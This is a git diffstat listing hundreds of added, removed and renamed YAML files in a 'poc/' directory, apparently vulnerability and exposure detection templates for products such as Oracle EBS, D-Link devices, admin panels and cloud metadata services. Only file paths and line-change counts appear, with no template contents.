poc/oracle/oracle-dbass-detect-9351.yaml | 21 -
poc/oracle/oracle-dbass-detect.yaml | 18 -
poc/oracle/oracle-dbcs-9353.yaml | 9 +-
...oracle-ebs-bispgraph-file-access-9360.yaml | 16 +-
.../oracle-ebs-sqllog-disclosure-9369.yaml | 26 -
.../oracle-ebs-sqllog-disclosure-9370.yaml | 18 +-
poc/oracle/oracle-ebs-xss-9373.yaml | 29 +
poc/oracle/oracle-ebs-xss-9376.yaml | 33 -
poc/oracle/oracle-ebs-xss-9377.yaml | 6 +-
poc/oracle/oracle-fatwire-lfi-9380.yaml | 21 +-
poc/oracle/oracle-http-server-12c-9383.yaml | 4 +-
poc/oracle/oracle-http-server-12c-9384.yaml | 19 +
poc/oracle/oracle-httpserver12c.yaml | 9 +-
.../oracle-integrated-manager-9386.yaml | 32 -
.../oracle-integrated-manager-9388.yaml | 8 +-
.../oracle-iplanet-web-server-9392.yaml | 28 +
poc/oracle/oracle-iplanet-web-server.yaml | 21 -
poc/oracle/oracle-opera-login.yaml | 38 +
poc/oracle/oracle-people-enterprise-9394.yaml | 22 -
poc/oracle/oracle-siebel-xss-9400.yaml | 25 +-
poc/oracle/oracle-siebel-xss-9402.yaml | 10 +-
poc/other/3cx-management-console-2.yaml | 10 +-
poc/other/3g-wireless-gateway-5.yaml | 5 +-
poc/other/3g-wireless-gateway-6.yaml | 14 +-
poc/other/44 - T9.yaml | 44 +-
poc/other/ATHD-DVR-fileRead.yaml | 4 +-
poc/other/Alibaba-Anyproxy-fileRead.yaml | 5 +-
poc/other/LayerSlider-plugin.yaml | 58 +
poc/other/NETSurveillance-fileRead.yaml | 3 +
poc/other/X-Remote-IP.yaml | 19 -
poc/other/access-log.yaml | 11 +-
poc/other/acenet-panel.yaml | 30 +
poc/other/acrolinx-dashboard.yaml | 14 +-
poc/other/activemq-panel-49.yaml | 28 -
poc/other/activemq-panel-52.yaml | 2 +
poc/other/activemq-panel-53.yaml | 19 +
...etix-panel.yaml => acunetix-panel-56.yaml} | 0
...x-panel-54.yaml => acunetix-panel-58.yaml} | 0
poc/other/adiscon-loganalyzer.yaml | 12 +-
poc/other/adminer-panel-74.yaml | 51 -
poc/other/adminer-panel-77.yaml | 41 +
poc/other/adminset-panel-78.yaml | 7 +-
poc/other/adminset-panel-79.yaml | 34 +
poc/other/adminset-panel-80.yaml | 28 -
poc/other/advance-setup-119.yaml | 32 +
poc/other/advance-setup-122.yaml | 7 +-
poc/other/akamai-cloudtest-253.yaml | 24 -
poc/other/akamai-cloudtest.yaml | 57 +-
poc/other/alibaba-canal-info-leak-266.yaml | 35 -
poc/other/alienvault-usm-271.yaml | 30 +
poc/other/alienvault-usm-272.yaml | 10 +-
poc/other/ampps-admin-panel-304.yaml | 5 +-
poc/other/ampps-admin-panel-305.yaml | 35 -
poc/other/ampps-admin-panel-306.yaml | 40 +
...listing.yaml => ampps-dirlisting-307.yaml} | 0
poc/other/ampps-dirlisting-308.yaml | 16 +-
poc/other/ampps-panel-309.yaml | 9 +-
poc/other/ampps-panel-310.yaml | 40 +
poc/other/ansible-semaphore-panel.yaml | 34 +
poc/other/antsword-backdoor-333.yaml | 40 -
poc/other/antsword-backdoor.yaml | 35 +
poc/other/arcgis-panel-531.yaml | 5 +-
.../artifactory-anonymous-deploy-549.yaml | 30 -
poc/other/artifactory-anonymous-deploy.yaml | 10 +-
poc/other/asana.yaml | 14 +-
poc/other/aspose-file-download-558.yaml | 27 +
poc/other/aspose-file-download-560.yaml | 19 +-
poc/other/aspose-ie-file-download-562.yaml | 6 +-
poc/other/aspose-pdf-file-download.yaml | 29 -
poc/other/aspose-words-file-download-571.yaml | 35 +
poc/other/aspose-words-file-download-572.yaml | 20 +-
poc/other/audiobookshelf-panel.yaml | 38 +
poc/other/automation-direct-596.yaml | 3 +-
poc/other/automation-direct-597.yaml | 42 -
poc/other/avtech-avn801-camera-panel.yaml | 11 +-
poc/other/axis-happyaxis-669.yaml | 9 +-
poc/other/axis-happyaxis-670.yaml | 31 -
poc/other/axis-happyaxis.yaml | 31 +
poc/other/barracuda-panel-686.yaml | 6 +-
...da-panel-685.yaml => barracuda-panel.yaml} | 0
poc/other/bash-scanner.yaml | 5 +-
poc/other/basic-cors-694.yaml | 12 +-
.../{basic-dns-example.yaml => basic.yaml} | 0
poc/other/beyondtrust-panel-720.yaml | 21 +
poc/other/bigip.yaml | 57 -
poc/other/bingmaps.yaml | 14 +-
poc/other/bitly.yaml | 9 +-
poc/other/bitrix-panel-748.yaml | 32 +
poc/other/bitrix-panel-750.yaml | 27 -
...anel-767.yaml => bookstack-panel-766.yaml} | 0
poc/other/buddy-panel-797.yaml | 30 -
poc/other/buddy-panel.yaml | 20 +-
poc/other/buddy-panel.yml | 26 +
...ti-panel-829.yaml => cacti-panel-828.yaml} | 0
.../cacti-weathermap-file-write-832.yaml | 22 +
.../cacti-weathermap-file-write-833.yaml | 26 -
poc/other/cacti-weathermap-file-write.yaml | 13 +-
poc/other/calendly.yaml | 14 +-
poc/other/campaignmonitor-841.yaml | 20 -
poc/other/campaignmonitor-842.yaml | 21 +
poc/other/campaignmonitor.yaml | 3 +-
poc/other/can-i-take-over-dns-852.yaml | 140 +
poc/other/cerebro-panel-878.yaml | 22 -
poc/other/cerebro-panel-881.yaml | 27 +
poc/other/certificate-validation-882.yaml | 13 -
poc/other/certificate-validation-884.yaml | 12 +
poc/other/certificate-validation.yaml | 1 +
poc/other/cgi-printenv-885.yaml | 5 +-
poc/other/cgi-printenv.yaml | 30 +
...t-page-888.yaml => cgi-test-page-887.yaml} | 0
poc/other/cgi-test-page-890.yaml | 8 +-
poc/other/checkmarx-panel-895.yaml | 5 +-
poc/other/checkpoint-panel-898.yaml | 29 -
poc/other/checkpoint-panel-899.yaml | 58 +-
poc/other/checkpoint-panel.yaml | 70 +-
poc/other/circarlife-setup-917.yaml | 2 +-
poc/other/circarlife-setup-918.yaml | 28 +
poc/other/circarlife-setup-920.yaml | 37 -
poc/other/circarlife-setup-921.yaml | 17 +-
poc/other/citrix-oob-memory-read.yaml | 38 +
...aml => clearpass-policy-manager-1001.yaml} | 0
...1007.yaml => clientaccesspolicy-1005.yaml} | 0
poc/other/clientaccesspolicy.yaml | 54 +-
poc/other/cloudinary.yaml | 12 +-
poc/other/cloudphysician-radar.yaml | 20 +-
poc/other/codeigniter-env.yaml | 6 +-
poc/other/cofense-vision-panel-1141.yaml | 27 -
poc/other/cofense-vision-panel-1142.yaml | 28 +
poc/other/cofense-vision-panel.yaml | 15 +-
poc/other/cold-fusion-cfcache-map.yaml | 56 +-
poc/other/concourse-ci-panel.yaml | 12 +-
poc/other/contacam-1197.yaml | 19 +-
poc/other/contacam-1198.yaml | 22 +-
poc/other/contact-form-7.yaml | 48 -
poc/other/content-scheme.yaml | 15 +-
poc/other/crossdomain-xml-1267.yaml | 29 +
poc/other/csod-panel-1286.yaml | 20 +
poc/other/cucm-username-enumeration.yaml | 8 +-
poc/other/custom_nuclei-2.yaml | 10 +-
poc/other/custom_nuclei-3.yaml | 44 +
poc/other/d-link-arbitary-fileread-7043.yaml | 27 +
poc/other/d-link-arbitary-fileread-7044.yaml | 21 -
poc/other/d-link-wireless-7047.yaml | 23 -
poc/other/d-link-wireless-7048.yaml | 6 +-
poc/other/dead-host-with-cname-6786.yaml | 23 -
poc/other/deimos-c2.yaml | 33 +
poc/other/deprecated-tls-6958.yaml | 19 +-
poc/other/deprecated-tls.yaml | 27 +-
poc/other/development-logs-6989.yaml | 40 -
...fileread(1).yaml => diaowen-fileread.yaml} | 0
poc/other/dir-listing-7003.yaml | 19 +
poc/other/dir-listing-7005.yaml | 8 +-
poc/other/dlink-850l-info-leak-7035.yaml | 37 +
poc/other/dlink-850l-info-leak-7037.yaml | 6 +-
poc/other/dlink-850l-info-leak-7039.yaml | 29 +
poc/other/dlink-file-read.yaml | 40 +-
poc/other/dokuwiki-panel.yaml | 28 -
poc/other/domcfg-page-7076.yaml | 8 +-
poc/other/domcfg-page.yaml | 12 +-
poc/other/drone-ci-panel-7091.yaml | 27 +
poc/other/drone-ci-panel.yaml | 19 +-
poc/other/dropbox.yaml | 13 +-
poc/other/druid-monitor-7100.yaml | 2 +-
poc/other/druid-monitor-7102.yaml | 22 +
poc/other/druid-monitor-7103.yaml | 18 -
poc/other/druid-monitor.yaml | 10 +-
poc/other/ds-store-file.yaml | 36 +
poc/other/dss-download-fileread-7117.yaml | 16 +-
poc/other/dss-download-fileread.yaml | 20 +
poc/other/dxplanning-panel.yaml | 37 -
...l => dynamic-broadcast-receiver-7141.yaml} | 0
poc/other/dynamic-broadcast-receiver.yaml | 38 +-
.../easy-media-gallery-pro-listing-7152.yaml | 22 +
.../easy-media-gallery-pro-listing-7153.yaml | 49 +-
poc/other/ecology-getshell.yaml | 6 +-
poc/other/emerson-power-panel.yaml | 14 +-
poc/other/entrust-identityguard.yaml | 23 +-
poc/other/{Bitrix_check_env.yaml => env.yaml} | 0
poc/other/envision-gateway-7227.yaml | 10 +-
poc/other/envision-gateway.yaml | 22 -
poc/other/error-logs-7254.yaml | 48 +-
poc/other/error-logs-7255.yaml | 61 +
poc/other/example-template.yaml | 8 +-
poc/other/f-secure-policy-manager-7560.yaml | 23 +
poc/other/f-secure-policy-manager-7564.yaml | 7 +-
...436.yaml => fatpipe-ipvpn-panel-7435.yaml} | 0
poc/other/fatpipe-ipvpn-panel.yaml | 20 +-
...scheme-7468.yaml => file-scheme-7467.yaml} | 0
poc/other/filezilla-7470.yaml | 35 +
poc/other/filezilla-7471.yaml | 1 +
poc/other/fiorilaunchpad-logon.yaml | 16 +-
poc/other/firebase-urls-7497.yaml | 8 +-
poc/other/firebase-urls-7499.yaml | 10 +-
poc/other/flightpath-panel.yaml | 12 +-
poc/other/formula.yaml | 59 +
poc/other/fortimail-panel-7532.yaml | 6 +-
poc/other/fortimail-panel.yaml | 18 +-
poc/other/fortinet-fortigate-panel-7536.yaml | 20 -
.../foulenzer-subdomain-tk (copy 1).yaml | 183 -
poc/other/foulenzer-subdomain-tk.yaml | 210 +-
poc/other/gespage-panel-7605.yaml | 34 -
poc/other/gespage-panel-7606.yaml | 34 +
poc/other/gespage-panel.yaml | 12 +-
poc/other/globalprotect-panel-7720.yaml | 21 -
poc/other/glpi-directory-listing-7734.yaml | 34 -
poc/other/glpi-directory-listing.yaml | 30 +
poc/other/glpidirectorylisting(1).yaml | 47 -
poc/other/glpidirectorylisting.yaml | 103 +-
poc/other/go-anywhere-client.yaml | 19 +-
poc/other/gogs-workflow-7760.yaml | 11 +
poc/other/gogs-workflow.yaml | 11 -
poc/other/goodjob-dashboard.yaml | 35 +
poc/other/gradle-enterprise-panel-7800.yaml | 14 +-
poc/other/gradle-enterprise-panel.yaml | 28 +-
poc/other/grafana-file-read-7810.yaml | 17 +-
poc/other/grafana-file-read-7812.yaml | 6 -
poc/other/h2console-panel-7866.yaml | 24 -
poc/other/h2console-panel.yaml | 18 +-
poc/other/hack5-cloud-c2.yaml | 32 -
poc/other/haivision-gateway-panel.yaml | 27 +
poc/other/hanming-lfr-7879.yaml | 7 +-
poc/other/hanming-lfr.yaml | 33 -
poc/other/haproxy-status-7883.yaml | 19 +-
...orkflow-7889.yaml => harbor-workflow.yaml} | 0
poc/other/heatmiser-wifi-thermostat-7923.yaml | 20 +-
poc/other/heatmiser-wifi-thermostat.yaml | 21 -
poc/other/hikvision-info-leak-7958.yaml | 34 -
poc/other/hikvision-info-leak.yaml | 21 +
poc/other/hitron-technologies-7961.yaml | 25 +
poc/other/hitron-technologies-7962.yaml | 24 -
poc/other/hitron-technologies.yaml | 18 +-
.../hjtcloud-arbitrary-file-read-7967.yaml | 37 -
poc/other/hjtcloud-arbitrary-file-read.yaml | 9 +-
...jtcloud-rest-arbitrary-file-read-7975.yaml | 9 +-
...=> hjtcloud-rest-arbitrary-file-read.yaml} | 0
poc/other/hmc-hybris-panel-7977.yaml | 19 -
poc/other/hmc-hybris-panel-7978.yaml | 19 +
poc/other/hmc-hybris-panel.yaml | 13 +-
.../honeywell-building-control-7987.yaml | 24 +
.../honeywell-building-control-7988.yaml | 24 -
...{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} | 0
poc/other/hp-ilo-5-8020.yaml | 33 +
poc/other/hp-service-manager-8032.yaml | 20 -
poc/other/hp-service-manager-8034.yaml | 24 +
poc/other/hp-service-manager.yaml | 6 +-
.../hpe-system-management-anonymous-8013.yaml | 21 -
poc/other/huawei-hg532e-panel-8065.yaml | 4 +-
poc/other/huawei-hg532e-panel-8066.yaml | 30 -
poc/other/huawei-hg532e-panel.yaml | 21 +-
poc/other/hubspot.yaml | 29 +-
poc/other/huijietong-cloud-fileread-8085.yaml | 23 +-
poc/other/huijietong-cloud-fileread.yaml | 31 +
poc/other/identity-services-engine-8146.yaml | 21 -
...dentityguard-selfservice-entrust-8142.yaml | 21 -
poc/other/immich-panel.yaml | 37 -
poc/other/interactsh-server-8165.yaml | 35 -
poc/other/interactsh-server.yaml | 20 +
poc/other/interlib-fileread-8171.yaml | 8 +-
poc/other/interlib-fileread-8173.yaml | 2 +-
poc/other/internet-service-8178.yaml | 20 +
poc/other/internet-service.yaml | 22 -
poc/other/iomega-emc-shared-nas.yaml | 18 +-
poc/other/ioncube-loader-wizard-8185.yaml | 10 +-
...d-8184.yaml => ioncube-loader-wizard.yaml} | 0
poc/other/ipstack.yaml | 12 +-
poc/other/iptime-router.yaml | 21 +-
...p-panel-8204.yaml => itop-panel-8205.yaml} | 0
poc/other/itop-panel.yaml | 16 +-
poc/other/ixcache-panel.yaml | 22 +-
poc/other/jaeger-ui-dashboard.yaml | 9 +-
poc/other/jamf-panel-8215.yaml | 6 +-
poc/other/jamf-panel-8216.yaml | 28 -
poc/other/jamf-panel.yaml | 21 +-
poc/other/jfrog-8306.yaml | 20 -
poc/other/jfrog.yaml | 19 +-
poc/other/jkstatus-manager-8344.yaml | 18 -
poc/other/jkstatus-manager-8347.yaml | 30 +-
poc/other/jmx-console-8351.yaml | 16 +
poc/other/jmx-console-8352.yaml | 15 -
.../{jolokia-8367.yaml => jolokia-8369.yaml} | 0
poc/other/jolokia-list-8360.yaml | 28 -
poc/other/jolokia-list-8361.yaml | 27 +
poc/other/jolokia-list.yaml | 12 +-
poc/other/jumpcloud.yaml | 11 +-
poc/other/kerio-connect-client-8452.yaml | 2 +-
poc/other/kerio-connect-client.yaml | 18 +-
poc/other/kingsoft-v8-file-read-8491.yaml | 6 +-
poc/other/kingsoft-v8-file-read.yaml | 34 +
poc/other/kubelet-healthz-8518.yaml | 1 -
poc/other/kubelet-healthz.yaml | 34 +
poc/other/kubelet-pods-8522.yaml | 1 -
poc/other/kubelet-pods-8523.yaml | 22 +
...570.yaml => landray-oa-fileread-8571.yaml} | 0
poc/other/leostream-panel-8610.yaml | 16 +-
poc/other/leostream-panel.yaml | 19 +-
poc/other/liveview-axis-camera-8648.yaml | 51 +
poc/other/lockself-panel.yaml | 28 -
poc/other/lokalise.yaml | 28 +-
poc/other/lotus-domino-version-8656.yaml | 6 +-
poc/other/lotus-domino-version-8657.yaml | 34 -
poc/other/lotus-domino-version.yaml | 30 +
...-8669.yaml => lucee-stack-trace-8668.yaml} | 0
poc/other/mailgun.yaml | 26 +-
poc/other/manageengine-adaudit-8730.yaml | 34 +
poc/other/manageengine-adaudit.yaml | 32 +-
.../manageengine-adselfservice-8736.yaml | 4 +-
.../manageengine-adselfservice-8738.yaml | 7 +-
.../manageengine-apex-helpdesk-8746.yaml | 24 -
.../manageengine-apex-helpdesk-8748.yaml | 19 +
poc/other/manageengine-apex-helpdesk.yaml | 19 +-
...anageengine-applications-manager-8751.yaml | 24 -
...anageengine-applications-manager-8753.yaml | 19 +
.../manageengine-applications-manager.yaml | 18 +-
.../manageengine-assetexplorer-8757.yaml | 3 +-
.../manageengine-assetexplorer-8758.yaml | 19 -
poc/other/manageengine-assetexplorer.yaml | 20 +-
poc/other/manageengine-desktop-8761.yaml | 4 +-
poc/other/manageengine-desktop-8763.yaml | 19 -
poc/other/manageengine-desktop.yaml | 19 +-
poc/other/manageengine-opmanager-8767.yaml | 26 +
poc/other/manageengine-opmanager-8768.yaml | 19 -
...aml => manageengine-servicedesk-8771.yaml} | 0
.../manageengine-supportcenter-8776.yaml | 4 +-
.../manageengine-supportcenter-8777.yaml | 19 -
poc/other/{get.yaml => match-1.yaml} | 0
...her-with-or.yaml => matcher-with-and.yaml} | 0
poc/other/meduza-stealer.yaml | 32 -
poc/other/memcached-stats.yaml | 15 +-
poc/other/metadata-alibaba-8807.yaml | 39 +
poc/other/metadata-alibaba-8809.yaml | 14 +-
poc/other/metadata-azure-8813.yaml | 42 -
poc/other/metadata-azure.yaml | 42 +
poc/other/metadata-hetzner-8822.yaml | 42 +
poc/other/metadata-hetzner.yaml | 10 +-
poc/other/metadata-openstack-8827.yaml | 21 +-
poc/other/metadata-openstack-8828.yaml | 10 +-
poc/other/metadata-service-alibaba.yaml | 60 +-
poc/other/mikrotik-graph-8870.yaml | 20 -
poc/other/mikrotik-graph-8871.yaml | 20 +
poc/other/mikrotik-routeros.yaml | 52 +-
poc/other/mini-start-page-8895.yaml | 21 +
poc/other/mini-start-page-8896.yaml | 22 -
poc/other/mini-start-page.yaml | 19 +-
poc/other/mobileiron-sentry.yaml | 32 +
poc/other/mobotix-guest-camera-8910.yaml | 20 -
poc/other/mobotix-guest-camera-8911.yaml | 19 +-
poc/other/moodle-changelog.yaml | 17 +-
poc/other/moodle-workplace-panel.yaml | 28 +
poc/other/mx-fingerprint-8973.yaml | 22 +-
poc/other/mx-fingerprint.yaml | 22 +
poc/other/mystic-stealer.yaml | 27 +
poc/other/nameserver-fingerprint-8998.yaml | 19 +-
poc/other/nameserver-fingerprint.yaml | 22 +
poc/other/navicat-server-panel.yaml | 39 -
poc/other/neos-panel-9015.yaml | 3 +-
poc/other/neos-panel.yaml | 22 +-
...panel-9020.yaml => nessus-panel-9017.yaml} | 0
poc/other/nessus-panel-9019.yaml | 7 +-
poc/other/netflix-conductor-ui.yaml | 27 +-
poc/other/netflix-conductor-version.yaml | 37 +-
poc/other/netis-info-leak-9036.yaml | 8 +-
poc/other/netis-info-leak.yaml | 30 +
poc/other/netrc-9045.yaml | 19 +-
poc/other/netscaler-gateway-9052.yaml | 23 -
poc/other/netscaler-gateway.yaml | 15 +-
poc/other/nextcloud-install-9084.yaml | 25 +
poc/other/nextcloud-install-9085.yaml | 28 -
poc/other/nexus-panel.yaml | 35 +
poc/other/nh-c2.yaml | 28 -
poc/other/ns-asg-file-read-9153.yaml | 24 -
poc/other/ns-asg-file-read.yaml | 36 -
poc/other/ntlm-directories-9155.yaml | 118 +-
poc/other/ntlm-directories-9156.yaml | 119 +-
poc/other/nuuo-file-inclusion-9169.yaml | 20 +-
poc/other/officedocuments.yaml | 11 +-
poc/other/oki-data-9223.yaml | 19 +
poc/other/oki-data-9226.yaml | 20 -
poc/other/oki-data.yaml | 19 +-
poc/other/okiko-sfiler-portal-9227.yaml | 32 +
...a-panel-9231.yaml => okta-panel-9234.yaml} | 0
poc/other/old-copyright-9237.yaml | 45 -
poc/other/old-copyright-9238.yaml | 3 +-
poc/other/one_line_checks_nuclei.yaml | 16 +-
poc/other/onliner-multiple-bugs.yaml | 62 +-
.../oob-param-based-interaction-9252.yaml | 26 +
poc/other/oob-param-based-interaction.yaml | 19 -
poc/other/open-mjpg-streamer-9282.yaml | 11 +-
poc/other/open-mjpg-streamer-9284.yaml | 26 -
poc/other/open-proxy-internal-9289.yaml | 111 -
poc/other/open-proxy-internal-9290.yaml | 134 +
poc/other/open-proxy-portscan-9295.yaml | 62 +
poc/other/open-proxy-portscan-9296.yaml | 6 +-
poc/other/open-proxy-portscan.yaml | 13 +-
...pen-virtualization-manager-panel-9328.yaml | 33 +
.../open-virtualization-manager-panel.yaml | 16 +-
poc/other/openam-workflow.yaml | 11 +
poc/other/opensis-workflow-9318.yaml | 11 +
...rkflow-9319.yaml => opensis-workflow.yaml} | 0
.../opentouch-multimediaservices-panel.yaml | 46 -
poc/other/overseerr-panel.yaml | 34 +
.../pacs-connexion-utilisateur-9425.yaml | 24 -
poc/other/pacs-connexion-utilisateur.yaml | 20 +-
poc/other/pagerduty.yaml | 16 +-
poc/other/pagespeed-global-admin-9433.yaml | 29 +
poc/other/pagespeed-global-admin-9435.yaml | 33 -
poc/other/pagespeed-global-admin.yaml | 8 +-
poc/other/pahtool-panel.yaml | 35 -
poc/other/panabit-panel-9444.yaml | 24 +
poc/other/panabit-panel-9445.yaml | 25 -
.../panasonic-network-management-9447.yaml | 20 -
.../panasonic-network-management-9448.yaml | 21 +
.../panasonic-network-management-9449.yaml | 5 +-
poc/other/parallels-html-client-9464.yaml | 16 +-
poc/other/passbolt-panel.yaml | 35 +
poc/other/pdi-device-page.yaml | 31 +
poc/other/pendo.yaml | 17 +-
...anel-9483.yaml => pentaho-panel-9481.yaml} | 0
poc/other/pivotaltracker.yaml | 15 +-
poc/other/plausible-panel.yaml | 35 +
poc/other/plesk-obsidian-9594.yaml | 24 -
poc/other/plesk-obsidian-9597.yaml | 3 +-
...sk-onyx-9598.yaml => plesk-onyx-9601.yaml} | 0
poc/other/plesk-onyx.yaml | 6 +-
poc/other/plesk-stat-9604.yaml | 43 -
poc/other/plesk-stat.yaml | 28 +
poc/other/plugin.yaml | 49 +
poc/other/portainer-init-deploy-9633.yaml | 24 +-
...y-9630.yaml => portainer-init-deploy.yaml} | 0
poc/other/posteio-admin-panel.yaml | 31 -
.../postmessage-outgoing-tracker-9634.yaml | 66 -
poc/other/postmessage-outgoing-tracker.yaml | 63 +
poc/other/postmessage-tracker-9637.yaml | 57 +-
poc/other/postmessage-tracker-9639.yaml | 47 +-
poc/other/powerlogic-ion-9648.yaml | 19 -
poc/other/powerlogic-ion-9650.yaml | 20 +
poc/other/powerlogic-ion.yaml | 24 +-
poc/other/printers-info-leak.yaml | 15 +-
...678.yaml => prometheus-exporter-9677.yaml} | 0
poc/other/prometheus-exporter.yaml | 26 +
poc/other/prometheus-flags-9687.yaml | 42 +
poc/other/prometheus-flags.yaml | 31 -
poc/other/prometheus-targets-9691.yaml | 38 -
poc/other/prototype-pollution-check-9698.yaml | 95 +
poc/other/prototype-pollution-check-9699.yaml | 95 -
poc/other/prototype-pollution-check.yaml | 134 +-
...path-9702.yaml => provider-path-9701.yaml} | 0
poc/other/ptr-fingerprint-9707.yaml | 19 +-
poc/other/ptr-fingerprint.yaml | 22 +
poc/other/pulse-secure-panel-9712.yaml | 19 +
poc/other/pulse-secure-panel-9715.yaml | 27 +-
...-enb.yaml => put-method-enabled-9727.yaml} | 0
poc/other/put-method-enabled.yaml | 25 -
poc/other/pypicloud-panel-9733.yaml | 24 +
poc/other/pypicloud-panel.yaml | 19 +-
poc/other/qdpm-info-leak-9753.yaml | 27 +
poc/other/qdpm-info-leak.yaml | 31 +
poc/other/qualcomm-voip-router.yaml | 18 +-
.../{race-multiple.yaml => race-simple.yaml} | 0
poc/other/radius-manager-9794.yaml | 22 +
poc/other/radius-manager-9796.yaml | 22 -
poc/other/rancher-panel.yaml | 31 +-
.../{get-override-sni.yaml => raw-get.yaml} | 0
poc/other/red-lion-panel.yaml | 26 +
poc/other/request-based-interaction-9862.yaml | 56 +
...63.yaml => request-based-interaction.yaml} | 0
poc/other/resin-inputfile-fileread-9868.yaml | 21 -
poc/other/resin-inputfile-fileread-9870.yaml | 22 +
poc/other/resin-inputfile-fileread-9871.yaml | 1 -
poc/other/resin-viewfile-lfr.yaml | 27 +
poc/other/robots-txt-9888.yaml | 28 +
poc/other/robots-txt-9890.yaml | 23 -
poc/other/rsa-self-service.yaml | 19 +-
poc/other/ruijie-EG-fileDown.yaml | 2 -
poc/other/ruijie-eg-filedown.yaml | 24 +
...8.yaml => scs-landfill-control-10097.yaml} | 0
poc/other/securenvoy-panel-10114.yaml | 19 -
poc/other/securenvoy-panel-10116.yaml | 19 +
poc/other/securepoint-utm-10117.yaml | 27 -
poc/other/securepoint-utm-10118.yaml | 32 +
poc/other/security-10123.yaml | 25 -
poc/other/security-10124.yaml | 23 +
poc/other/security-txt.yaml | 2 +
poc/other/selea-ip-camera-10136.yaml | 30 -
poc/other/selfcheck-panel.yaml | 33 +
poc/other/sendgrid.yaml | 6 +-
poc/other/server-status-localhost-10163.yaml | 14 +-
poc/other/server-status-localhost-10165.yaml | 28 -
poc/other/server-status-localhost-10166.yaml | 22 +
poc/other/servfail-refused-hosts-10167.yaml | 9 +-
poc/other/servfail-refused-hosts-10170.yaml | 16 +-
poc/other/shell-history-10192.yaml | 28 +-
...-history-10193.yaml => shell-history.yaml} | 0
poc/other/shellscripts.yaml | 28 +-
poc/other/short-io.yaml | 15 +-
poc/other/sidekiq-dashboard-10235.yaml | 19 -
poc/other/sidekiq-dashboard-10239.yaml | 22 +
poc/other/signatures-10248.yaml | 52090 ++++++++++-
poc/other/signatures-10268.yaml | 2170 +
poc/other/signatures.yaml | 75682 +++++++++++++++-
poc/other/sitemap.yaml | 40 -
...4.yaml => skycaiji-admin-panel-10306.yaml} | 0
poc/other/slack.yaml | 10 +-
poc/other/softether-vpn-panel.yaml | 30 -
poc/other/solarwinds-orion-10357.yaml | 17 +
poc/other/solarwinds-orion-10359.yaml | 15 -
poc/other/solarwinds-orion.yaml | 16 +-
poc/other/solr-fileRead.yaml | 5 +-
poc/other/solr-fileread.yaml | 33 +
poc/other/solr-query-dashboard-10368.yaml | 25 +
poc/other/solr-query-dashboard.yaml | 20 -
...l => sonarqube-public-projects-10377.yaml} | 0
poc/other/sonicwall-management-panel.yaml | 16 +-
...yaml => sonicwall-sslvpn-panel-10388.yaml} | 0
poc/other/sonicwall-sslvpn-panel.yaml | 24 +-
.../sonicwall-sslvpn-shellshock-10394.yaml | 20 +-
.../sonicwall-sslvpn-shellshock-10395.yaml | 27 +
poc/other/sphinxonline-panel.yaml | 43 +
...spidercontrol-scada-server-info-10411.yaml | 9 +-
...spidercontrol-scada-server-info-10413.yaml | 38 -
poc/other/splunk-enterprise-panel-10415.yaml | 31 -
.../spoofable-spf-records-ptr-10424.yaml | 19 +
.../spoofable-spf-records-ptr-10425.yaml | 16 -
poc/other/square.yaml | 16 +-
...squid-analysis-report-generator-10513.yaml | 5 +-
poc/other/sugarcrm-panel.yaml | 8 +-
poc/other/supershell-c2.yaml | 34 -
poc/other/supervpn-panel-10577.yaml | 27 -
.../symantec-messaging-gateway-10607.yaml | 7 +-
.../symantec-messaging-gateway-10610.yaml | 19 -
.../symantec-pgp-global-directory-10611.yaml | 21 +
poc/other/symantec-pgp-global-directory.yaml | 19 +-
poc/other/symfony-profiler-10628.yaml | 4 +-
poc/other/symfony-profiler.yaml | 29 +-
poc/other/synopsys-coverity-panel.yaml | 36 -
poc/other/tableau-panel.yaml | 18 +-
poc/other/tabnabbing-check-10646.yaml | 22 +
.../teamcity-registration-enabled-10667.yaml | 34 -
poc/other/teamcity-registration-enabled.yaml | 30 +
poc/other/teamforge-panel.yaml | 43 +
poc/other/tectuus-scada-monitor.yaml | 16 +-
poc/other/tekon-info-leak-10684.yaml | 8 +-
poc/other/tekon-info-leak-10685.yaml | 40 +
poc/other/teradici-pcoip-10703.yaml | 7 +
poc/other/teradici-pcoip.yaml | 26 -
.../terraform-enterprise-panel-10710.yaml | 27 -
.../terraform-enterprise-panel-10711.yaml | 27 +
poc/other/terraform-enterprise-panel.yaml | 19 +-
poc/other/thinfinity-virtualui-panel.yaml | 18 +-
poc/other/thinkCMF_include.yaml | 2 +
...inkcmf-arbitrary-code-execution-10715.yaml | 29 -
.../thinkcmf-arbitrary-code-execution.yaml | 23 +
poc/other/thinkcmf_include.yaml | 22 -
poc/other/tianqing-info-leak.yaml | 11 +-
poc/other/tibco-spotfire-panel.yaml | 35 +
poc/other/tigase-xmpp-server.yaml | 31 +
poc/other/tileserver-gl-10786.yaml | 21 +-
poc/other/tileserver-gl.yaml | 33 +
poc/other/tor-socks-proxy-10811.yaml | 29 -
poc/other/traefik-dashboard-10832.yaml | 15 -
poc/other/traefik-dashboard-10834.yaml | 15 +
poc/other/travisci.yaml | 6 +-
.../tuxedo-connected-controller-10852.yaml | 20 +
.../tuxedo-connected-controller-10855.yaml | 21 -
poc/other/tuxedo-connected-controller.yaml | 5 +-
poc/other/upnp-device-10981.yaml | 3 +-
poc/other/upnp-device-10982.yaml | 39 -
poc/other/ups-status-10983.yaml | 20 -
poc/other/ups-status-10985.yaml | 21 +
poc/other/url.yaml | 41 +-
poc/other/veriz0wn-osint.yaml | 29 -
...5.yaml => voipmonitor-workflow-11064.yaml} | 0
poc/other/voipmonitor-workflow.yaml | 11 -
poc/other/wago-plc-panel-11091.yaml | 2 +-
.../wallix-accessmanager-panel-11094.yaml | 29 -
.../wallix-accessmanager-panel-11095.yaml | 30 +
poc/other/wallix-accessmanager-panel.yaml | 22 +-
poc/other/wazuh-panel-11113.yaml | 33 -
poc/other/wazuh-panel-11114.yaml | 34 +
poc/other/wazuh-panel.yaml | 10 +-
poc/other/weatherlink-11117.yaml | 3 +-
poc/other/weatherlink.yaml | 22 +-
...-leakage(1).yaml => wireless-leakage.yaml} | 0
poc/other/woosidebars.yaml | 5 +-
poc/other/wooyun-2015-148227(1).yaml | 26 +
poc/other/wooyun-2015-148227-11224.yaml | 23 +-
poc/other/wooyun-2015-148227-11225.yaml | 2 +-
poc/other/wooyun-2015-148227-11228.yaml | 1 +
poc/other/workspace-one-uem-11393.yaml | 17 -
poc/other/workspace-one-uem-11394.yaml | 16 +
poc/other/workspace-one-uem.yaml | 5 +-
poc/other/wowza-streaming-engine-11399.yaml | 22 -
poc/other/wowza-streaming-engine.yaml | 12 +-
